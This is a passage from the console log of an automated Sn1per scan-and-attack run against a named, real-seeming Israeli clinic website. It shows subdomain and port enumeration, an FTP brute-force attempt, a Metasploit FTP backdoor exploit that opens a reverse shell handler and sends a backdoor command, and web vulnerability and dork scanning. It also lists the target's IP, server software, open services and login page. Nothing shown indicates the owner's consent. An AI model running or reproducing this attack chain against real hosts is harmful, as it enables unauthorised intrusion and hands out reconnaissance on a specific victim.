  4445. Trying Zone Transfer for doctorarik.co.il on ns2.dtnt.info ...
  4446.  
  4447. Trying Zone Transfer for doctorarik.co.il on ns1.dtnt.info ...
  4448.  
  4449. brute force file not specified, bay.
  4450.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
  4451. 
  4452. ____ _ _ _ _ _____
  4453. / ___| _ _| |__ | (_)___| |_|___ / _ __
  4454. \___ \| | | | '_ \| | / __| __| |_ \| '__|
  4455. ___) | |_| | |_) | | \__ \ |_ ___) | |
  4456. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  4457.  
  4458. # Coded By Ahmed Aboul-Ela - @aboul3la
  4459.  
  4460. [-] Enumerating subdomains now for doctorarik.co.il
  4461. [-] verbosity is enabled, will show the subdomains results in realtime
  4462. [-] Searching now in Baidu..
  4463. [-] Searching now in Yahoo..
  4464. [-] Searching now in Google..
  4465. [-] Searching now in Bing..
  4466. [-] Searching now in Ask..
  4467. [-] Searching now in Netcraft..
  4468. [-] Searching now in DNSdumpster..
  4469. [-] Searching now in Virustotal..
  4470. [-] Searching now in ThreatCrowd..
  4471. [-] Searching now in SSL Certificates..
  4472. [-] Searching now in PassiveDNS..
  4473. Yahoo: www.doctorarik.co.il
  4474. Virustotal: www.doctorarik.co.il
  4475. DNSdumpster: mail.doctorarik.co.il
  4476. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-doctorarik.co.il.txt
  4477. [-] Total Unique Subdomains Found: 2
  4478. www.doctorarik.co.il
  4479. mail.doctorarik.co.il
  4480.  
  4481.  ╔═╗╦═╗╔╦╗╔═╗╦ ╦
  4482.  ║ ╠╦╝ ║ ╚═╗╠═╣
  4483.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
  4484.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
  4485. 
  4486.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-doctorarik.co.il-full.txt
  4487. 
  4488.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
  4489.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
  4490.  
  4491.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
  4492. PING doctorarik.co.il (62.219.91.10) 56(84) bytes of data.
  4493.  
  4494. --- doctorarik.co.il ping statistics ---
  4495. 1 packets transmitted, 0 received, 100% packet loss, time 0ms
  4496.  
  4497.  
  4498.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
  4499.  
  4500. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-30 23:18 EST
  4501. Warning: 62.219.91.10 giving up on port because retransmission cap hit (2).
  4502. Nmap scan report for doctorarik.co.il (62.219.91.10)
  4503. Host is up (0.43s latency).
  4504. rDNS record for 62.219.91.10: cust-62-219-91-10.cust.bezeqint.net
  4505. Not shown: 468 filtered ports, 1 closed port
  4506. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  4507. PORT STATE SERVICE
  4508. 21/tcp open ftp
  4509. 80/tcp open http
  4510. 443/tcp open https
  4511. 8443/tcp open https-alt
  4512.  
  4513. Nmap done: 1 IP address (1 host up) scanned in 14.04 seconds
  4514.  
  4515.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
  4516.  + -- --=[Port 21 opened... running tests...
  4517.  
  4518. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-30 23:18 EST
  4519. Nmap scan report for doctorarik.co.il (62.219.91.10)
  4520. Host is up (0.19s latency).
  4521. rDNS record for 62.219.91.10: cust-62-219-91-10.cust.bezeqint.net
  4522.  
  4523. PORT STATE SERVICE VERSION
  4524. 21/tcp open ftp Microsoft ftpd
  4525. | ftp-brute:
  4526. | Accounts: No valid accounts found
  4527. |_ Statistics: Performed 1410 guesses in 182 seconds, average tps: 7.4
  4528. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  4529. Device type: general purpose|phone
  4530. Running (JUST GUESSING): Microsoft Windows 2008|7|8.1|Phone|Vista (98%)
  4531. OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
  4532. Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (98%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 8.1 R1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%)
  4533. No exact OS matches for host (test conditions non-ideal).
  4534. Network Distance: 13 hops
  4535. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  4536.  
  4537. TRACEROUTE (using port 21/tcp)
  4538. HOP RTT ADDRESS
  4539. 1 283.28 ms 10.13.0.1
  4540. 2 300.20 ms 37.187.24.253
  4541. 3 292.21 ms 10.50.225.61
  4542. 4 296.97 ms 10.17.129.40
  4543. 5 287.79 ms 10.73.0.50
  4544. 6 ...
  4545. 7 303.72 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
  4546. 8 391.49 ms 80.249.209.46
  4547. 9 397.77 ms bzq-179-124-101.cust.bezeqint.net (212.179.124.101)
  4548. 10 381.01 ms bzq-219-189-213.dsl.bezeqint.net (62.219.189.213)
  4549. 11 180.04 ms bzq-218-77-74.red.bezeqint.net (81.218.77.74)
  4550. 12 180.76 ms 62.219.24.28
  4551. 13 173.76 ms cust-62-219-91-10.cust.bezeqint.net (62.219.91.10)
  4552.  
  4553. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  4554. Nmap done: 1 IP address (1 host up) scanned in 204.62 seconds
  4555.  , ,
  4556. / \
  4557. ((__---,,,---__))
  4558. (_) O O (_)_________
  4559. \ _ / |\
  4560. o_o \ M S F | \
  4561. \ _____ | *
  4562. ||| WW|||
  4563. ||| |||
  4564. 
  4565.  
  4566. =[ metasploit v4.16.26-dev ]
  4567. + -- --=[ 1714 exploits - 975 auxiliary - 300 post ]
  4568. + -- --=[ 507 payloads - 40 encoders - 10 nops ]
  4569. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  4570.  
  4571. RHOST => doctorarik.co.il
  4572. RHOSTS => doctorarik.co.il
  4573. [*] doctorarik.co.il:21 - Banner: 220 Microsoft FTP Service
  4574. [*] doctorarik.co.il:21 - USER: 331 Password required for 8sP:).
  4575. [*] Exploit completed, but no session was created.
  4576. [*] Started reverse TCP double handler on 10.13.2.94:4444
  4577. [*] doctorarik.co.il:21 - Sending Backdoor Command
  4578. [*] Exploit completed, but no session was created.
  4579.  + -- --=[Port 22 closed... skipping.
  4580.  + -- --=[Port 23 closed... skipping.
  4581.  + -- --=[Port 25 closed... skipping.
  4582.  + -- --=[Port 53 closed... skipping.
  4583.  + -- --=[Port 79 closed... skipping.
  4584.  + -- --=[Port 80 opened... running tests...
  4585.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  4586.  
  4587. ^ ^
  4588. _ __ _ ____ _ __ _ _ ____
  4589. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  4590. | V V // o // _/ | V V // 0 // 0 // _/
  4591. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  4592. <
  4593. ...'
  4594.  
  4595. WAFW00F - Web Application Firewall Detection Tool
  4596.  
  4597. By Sandro Gauci && Wendel G. Henrique
  4598.  
  4599. Checking http://doctorarik.co.il
  4600. Generic Detection results:
  4601. The site http://doctorarik.co.il seems to be behind a WAF or some sort of security solution
  4602. Reason: Blocking is being done at connection/packet level.
  4603. Number of requests: 9
  4604.  
  4605.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  4606. http://doctorarik.co.il [301 Moved Permanently] Country[ISRAEL][IL], HTTPServer[Microsoft-IIS/7.5], IP[62.219.91.10], Microsoft-IIS[7.5], RedirectLocation[http://www.doctorarik.co.il/], Title[Document Moved], UncommonHeaders[x-powered-by-plesk], X-Powered-By[ASP.NET]
  4607. http://www.doctorarik.co.il/ [200 OK] Cookies[PHPSESSID], Country[ISRAEL][IL], HTTPServer[Microsoft-IIS/7.5], IP[62.219.91.10], JQuery[1], Microsoft-IIS[7.5], Script[text/javascript], Title[הרזיה, הרזיה בריאה, הרזיה נכונה- מרפאת הרזיה של ד"ר אריק ויסבורד], UncommonHeaders[x-powered-by-plesk], WordPress, X-Powered-By[ASP.NET], x-pingback[http://www.doctorarik.co.il/xmlrpc.php]
  4608.  
  4609.  __ ______ _____ 
  4610.  \ \/ / ___|_ _|
  4611.  \ /\___ \ | | 
  4612.  / \ ___) || | 
  4613.  /_/\_|____/ |_| 
  4614.  
  4615. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  4616. + -- --=[Target: doctorarik.co.il:80
  4617.  
  4618.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  4619. + -- --=[Checking if X-Content options are enabled on doctorarik.co.il... 
  4620.  
  4621. + -- --=[Checking if X-Frame options are enabled on doctorarik.co.il... 
  4622.  
  4623. + -- --=[Checking if X-XSS-Protection header is enabled on doctorarik.co.il... 
  4624.  
  4625. + -- --=[Checking HTTP methods on doctorarik.co.il... 
  4626.  
  4627. + -- --=[Checking if TRACE method is enabled on doctorarik.co.il... 
  4628.  
  4629. + -- --=[Checking for META tags on doctorarik.co.il... 
  4630.  
  4631. + -- --=[Checking for open proxy on doctorarik.co.il... 
  4632. ' <span class="separator"></span> <a class="copyright" href="http://www.parallels.com">&copy; 1999-2013. Parallels IP Holdings GmbH.<br />All rights reserved.</a>');
  4633. }
  4634. </script>
  4635. </div>
  4636. </div>
  4637.  
  4638. <script>(function(){var D=document,W=window;function A(){if(W.plesk){return;}W.plesk=1;if(D.getElementsByTagName){var S=D.getElementsByTagName("head")[0].appendChild(D.createElement("script"));S.setAttribute("src","http://promo.parallels.com/js/promo.plesk.js")}}if(D.addEventListener){D.addEventListener("DOMContentLoaded",A,false)}/*@cc_on D.write("\x3cscript id=\"_IE_onload\" defer=\"defer\" src=\"javascript:void(0)\">\x3c\/script>");(D.getElementById("_IE_onload")).onreadystatechange=function(){if(this.readyState=="complete"){A()}};@*/if(/WebK/i.test(navigator.userAgent)){var C=setInterval(function(){if(/loaded|complete/.test(D.readyState)){clearInterval(C);A()}},10)}W[/*@cc_on !@*/0?'attachEvent':'addEventListener'](/*@cc_on 'on'+@*/'load',A,false)})()</script>
  4639.  
  4640. </body>
  4641. </html>
  4642. + -- --=[Enumerating software on doctorarik.co.il... 
  4643. Server: Microsoft-IIS/7.5
  4644. X-Powered-By: ASP.NET
  4645. X-Powered-By-Plesk: PleskWin
  4646.  
  4647. + -- --=[Checking if Strict-Transport-Security is enabled on doctorarik.co.il... 
  4648.  
  4649. + -- --=[Checking for Flash cross-domain policy on doctorarik.co.il... 
  4650. <head><title>Document Moved</title></head>
  4651. <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.doctorarik.co.il/crossdomain.xml">here</a></body>
  4652. + -- --=[Checking for Silverlight cross-domain policy on doctorarik.co.il... 
  4653. <head><title>Document Moved</title></head>
  4654. <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.doctorarik.co.il/clientaccesspolicy.xml">here</a></body>
  4655. + -- --=[Checking for HTML5 cross-origin resource sharing on doctorarik.co.il... 
  4656.  
  4657. + -- --=[Retrieving robots.txt on doctorarik.co.il... 
  4658. <head><title>Document Moved</title></head>
  4659. <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.doctorarik.co.il/robots.txt">here</a></body>
  4660. + -- --=[Retrieving sitemap.xml on doctorarik.co.il... 
  4661. <head><title>Document Moved</title></head>
  4662. <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.doctorarik.co.il/sitemap.xml">here</a></body>
  4663. + -- --=[Checking cookie attributes on doctorarik.co.il... 
  4664.  
  4665. + -- --=[Checking for ASP.NET Detailed Errors on doctorarik.co.il... 
  4666.  
  4667. 
  4668.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  4669. - Nikto v2.1.6
  4670. ---------------------------------------------------------------------------
  4671. + Target IP: 62.219.91.10
  4672. + Target Hostname: doctorarik.co.il
  4673. + Target Port: 80
  4674. + Start Time: 2017-12-30 23:23:35 (GMT-5)
  4675. ---------------------------------------------------------------------------
  4676. + Server: Microsoft-IIS/7.5
  4677. + Retrieved x-powered-by header: ASP.NET
  4678. + The anti-clickjacking X-Frame-Options header is not present.
  4679. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  4680. + Uncommon header 'x-powered-by-plesk' found, with contents: PleskWin
  4681. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  4682. + Root page / redirects to: http://www.doctorarik.co.il/
  4683. + No CGI Directories found (use '-C all' to force check all possible dirs)
  4684. + Scan terminated: 20 error(s) and 5 item(s) reported on remote host
  4685. + End Time: 2017-12-30 23:31:03 (GMT-5) (448 seconds)
  4686. ---------------------------------------------------------------------------
  4687. + 1 host(s) tested
  4688.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  4689. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/doctorarik.co.il-port80.jpg
  4690.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
  4691.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
  4692.  
  4693.  _____  .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
  4694.  (_____) 01 01N. C 01 C 01 .01. 01  01 Yb 01 .01.
  4695.  (() ()) 01 C YCb C 01 C 01 ,C9 01  01 dP 01 ,C9
  4696.  \ /  01 C .CN. C 01 C 0101dC9 01  01'''bg. 0101dC9
  4697.  \ /  01 C .01.C 01 C 01 YC. 01 ,  01 .Y 01 YC.
  4698.  /=\  01 C Y01 YC. ,C 01 .Cb. 01 ,C  01 ,9 01 .Cb.
  4699.  [___]  .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
  4700.  
  4701. __[ ! ] Neither war between hackers, nor peace for the system.
  4702. __[ ! ] http://blog.inurl.com.br
  4703. __[ ! ] http://fb.com/InurlBrasil
  4704. __[ ! ] http://twitter.com/@googleinurl
  4705. __[ ! ] http://github.com/googleinurl
  4706. __[ ! ] Current PHP version::[ 7.0.26-1 ]
  4707. __[ ! ] Current script owner::[ root ]
  4708. __[ ! ] Current uname::[ Linux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 ]
  4709. __[ ! ] Current pwd::[ /usr/share/sniper ]
  4710. __[ ! ] Help: php inurlbr.php --help
  4711. ------------------------------------------------------------------------------------------------------------------------
  4712.  
  4713. [ ! ] Starting SCANNER INURLBR 2.1 at [30-12-2017 23:32:33]
  4714. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  4715. It is the end user's responsibility to obey all applicable local, state and federal laws.
  4716. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  4717.  
  4718. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-doctorarik.co.il.txt ]
  4719. [ INFO ][ DORK ]::[ site:doctorarik.co.il ]
  4720. [ INFO ][ SEARCHING ]:: {
  4721. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.ee ]
  4722.  
  4723. [ INFO ][ SEARCHING ]:: 
  4724. -[:::]
  4725. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  4726.  
  4727. [ INFO ][ SEARCHING ]:: 
  4728. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  4729. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.im ID: 012347377894689429761:wgkj5jn9ee4 ]
  4730.  
  4731. [ INFO ][ SEARCHING ]:: 
  4732. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  4733.  
  4734. [ INFO ][ TOTAL FOUND VALUES ]:: [ 63 ]
  4735.  
  4736. 
  4737.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4738. |_[ + ] [ 0 / 63 ]-[23:32:57] [ - ] 
  4739. |_[ + ] Target:: [ http://www.doctorarik.co.il/ ]
  4740. |_[ + ] Exploit:: 
  4741. |_[ + ] Information Server:: , , IP:62.219.91.10:80 
  4742. |_[ + ] More details::  / - / , ISP: 
  4743. |_[ + ] Found:: UNIDENTIFIED
  4744. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  4745. 
  4746.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4747. |_[ + ] [ 1 / 63 ]-[23:33:02] [ - ] 
  4748. |_[ + ] Target:: [ http://www.doctorarik.co.il/20170629102001-ooy-425.html ]
  4749. |_[ + ] Exploit:: 
  4750. |_[ + ] Information Server:: , , IP::0 
  4751. |_[ + ] More details:: 
  4752. |_[ + ] Found:: UNIDENTIFIED
  4753. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4754. 
  4755.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4756. |_[ + ] [ 2 / 63 ]-[23:33:07] [ - ] 
  4757. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult/ ]
  4758. |_[ + ] Exploit:: 
  4759. |_[ + ] Information Server:: , , IP::0 
  4760. |_[ + ] More details:: 
  4761. |_[ + ] Found:: UNIDENTIFIED
  4762. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4763. 
  4764.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4765. |_[ + ] [ 3 / 63 ]-[23:33:12] [ - ] 
  4766. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/child ]
  4767. |_[ + ] Exploit:: 
  4768. |_[ + ] Information Server:: , , IP::0 
  4769. |_[ + ] More details:: 
  4770. |_[ + ] Found:: UNIDENTIFIED
  4771. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4772. 
  4773.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4774. |_[ + ] [ 4 / 63 ]-[23:33:22] [ - ] 
  4775. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/thetencommandments/ ]
  4776. |_[ + ] Exploit:: 
  4777. |_[ + ] Information Server:: , , IP:62.219.91.10:80 
  4778. |_[ + ] More details::  / - / , ISP: 
  4779. |_[ + ] Found:: UNIDENTIFIED
  4780. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  4781. 
  4782.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4783. |_[ + ] [ 5 / 63 ]-[23:33:30] [ - ] 
  4784. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/business/ ]
  4785. |_[ + ] Exploit:: 
  4786. |_[ + ] Information Server:: , , IP:62.219.91.10:80 
  4787. |_[ + ] More details::  / - / , ISP: 
  4788. |_[ + ] Found:: UNIDENTIFIED
  4789. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  4790. 
  4791.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4792. |_[ + ] [ 6 / 63 ]-[23:33:38] [ - ] 
  4793. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/contact/ ]
  4794. |_[ + ] Exploit:: 
  4795. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4796. |_[ + ] More details::  / - / , ISP: 
  4797. |_[ + ] Found:: UNIDENTIFIED
  4798. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 7773 out of 16348 bytes received
  4799. 
  4800.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4801. |_[ + ] [ 7 / 63 ]-[23:33:43] [ - ] 
  4802. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/checkyourself/ ]
  4803. |_[ + ] Exploit:: 
  4804. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4805. |_[ + ] More details::  / - / , ISP: 
  4806. |_[ + ] Found:: UNIDENTIFIED
  4807. 
  4808.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4809. |_[ + ] [ 8 / 63 ]-[23:33:50] [ - ] 
  4810. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/about/ ]
  4811. |_[ + ] Exploit:: 
  4812. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4813. |_[ + ] More details::  / - / , ISP: 
  4814. |_[ + ] Found:: UNIDENTIFIED
  4815. 
  4816.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4817. |_[ + ] [ 9 / 63 ]-[23:33:57] [ - ] 
  4818. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult/movie/ ]
  4819. |_[ + ] Exploit:: 
  4820. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4821. |_[ + ] More details::  / - / , ISP: 
  4822. |_[ + ] Found:: UNIDENTIFIED
  4823. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 9121 out of 15003 bytes received
  4824. 
  4825.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4826. |_[ + ] [ 10 / 63 ]-[23:34:03] [ - ] 
  4827. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult/keepslimming/ ]
  4828. |_[ + ] Exploit:: 
  4829. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4830. |_[ + ] More details::  / - / , ISP: 
  4831. |_[ + ] Found:: UNIDENTIFIED
  4832. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 18557 out of 23967 bytes received
  4833. 
  4834.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4835. |_[ + ] [ 11 / 63 ]-[23:34:12] [ - ] 
  4836. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/child/parentstips/ ]
  4837. |_[ + ] Exploit:: 
  4838. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4839. |_[ + ] More details::  / - / , ISP: 
  4840. |_[ + ] Found:: UNIDENTIFIED
  4841. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 13165 out of 19394 bytes received
  4842. 
  4843.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4844. |_[ + ] [ 12 / 63 ]-[23:34:20] [ - ] 
  4845. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/child/childfaq/ ]
  4846. |_[ + ] Exploit:: 
  4847. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4848. |_[ + ] More details::  / - / , ISP: 
  4849. |_[ + ] Found:: UNIDENTIFIED
  4850. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 10469 out of 24867 bytes received
  4851. 
  4852.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4853. |_[ + ] [ 13 / 63 ]-[23:34:30] [ - ] 
  4854. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult/adultcustomers/ ]
  4855. |_[ + ] Exploit:: 
  4856. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4857. |_[ + ] More details::  / - / , ISP: 
  4858. |_[ + ] Found:: UNIDENTIFIED
  4859. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 10469 out of 21199 bytes received
  4860. 
  4861.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4862. |_[ + ] [ 14 / 63 ]-[23:34:40] [ - ] 
  4863. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult/adultfaq/ ]
  4864. |_[ + ] Exploit:: 
  4865. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4866. |_[ + ] More details::  / - / , ISP: 
  4867. |_[ + ] Found:: UNIDENTIFIED
  4868. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 18557 out of 47581 bytes received
  4869. 
  4870.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4871. |_[ + ] [ 15 / 63 ]-[23:34:45] [ - ] 
  4872. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/child/recipes/ ]
  4873. |_[ + ] Exploit:: 
  4874. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4875. |_[ + ] More details::  / - / , ISP: 
  4876. |_[ + ] Found:: UNIDENTIFIED
  4877. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 2381 out of 21166 bytes received
  4878. 
  4879.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4880. |_[ + ] [ 16 / 63 ]-[23:34:52] [ - ] 
  4881. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult/myprogram/ ]
  4882. |_[ + ] Exploit:: 
  4883. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4884. |_[ + ] More details::  / - / , ISP: 
  4885. |_[ + ] Found:: UNIDENTIFIED
  4886. 
  4887.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4888. |_[ + ] [ 17 / 63 ]-[23:34:57] [ - ] 
  4889. |_[ + ] Target:: [ http://www.doctorarik.co.il/wp-login.php ]
  4890. |_[ + ] Exploit:: 
  4891. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4892. |_[ + ] More details::  / - / , ISP: 
  4893. |_[ + ] Found:: UNIDENTIFIED
  4894. 
  4895.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4896. |_[ + ] [ 18 / 63 ]-[23:35:00] [ - ] 
  4897. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/child/myths/ ]
  4898. |_[ + ] Exploit:: 
  4899. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4900. |_[ + ] More details::  / - / , ISP: 
  4901. |_[ + ] Found:: UNIDENTIFIED
  4902. 
  4903.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4904. |_[ + ] [ 19 / 63 ]-[23:35:06] [ - ] 
  4905. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/business/businesstips/ ]
  4906. |_[ + ] Exploit:: 
  4907. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4908. |_[ + ] More details::  / - / , ISP: 
  4909. |_[ + ] Found:: UNIDENTIFIED
  4910. 
  4911.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4912. |_[ + ] [ 20 / 63 ]-[23:35:12] [ - ] 
  4913. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/business/businessmyway/ ]
  4914. |_[ + ] Exploit:: 
  4915. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4916. |_[ + ] More details::  / - / , ISP: 
  4917. |_[ + ] Found:: UNIDENTIFIED
  4918. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 13229 out of 15092 bytes received
  4919. 
  4920.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4921. |_[ + ] [ 21 / 63 ]-[23:35:19] [ - ] 
  4922. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/business/businessnutrition/ ]
  4923. |_[ + ] Exploit:: 
  4924. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4925. |_[ + ] More details::  / - / , ISP: 
  4926. |_[ + ] Found:: UNIDENTIFIED
  4927. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 13229 out of 16283 bytes received
  4928. 
  4929.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4930. |_[ + ] [ 22 / 63 ]-[23:35:22] [ - ] 
  4931. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/child/stepbystep/ ]
  4932. |_[ + ] Exploit:: 
  4933. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4934. |_[ + ] More details::  / - / , ISP: 
  4935. |_[ + ] Found:: UNIDENTIFIED
  4936. 
  4937.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4938. |_[ + ] [ 23 / 63 ]-[23:35:28] [ - ] 
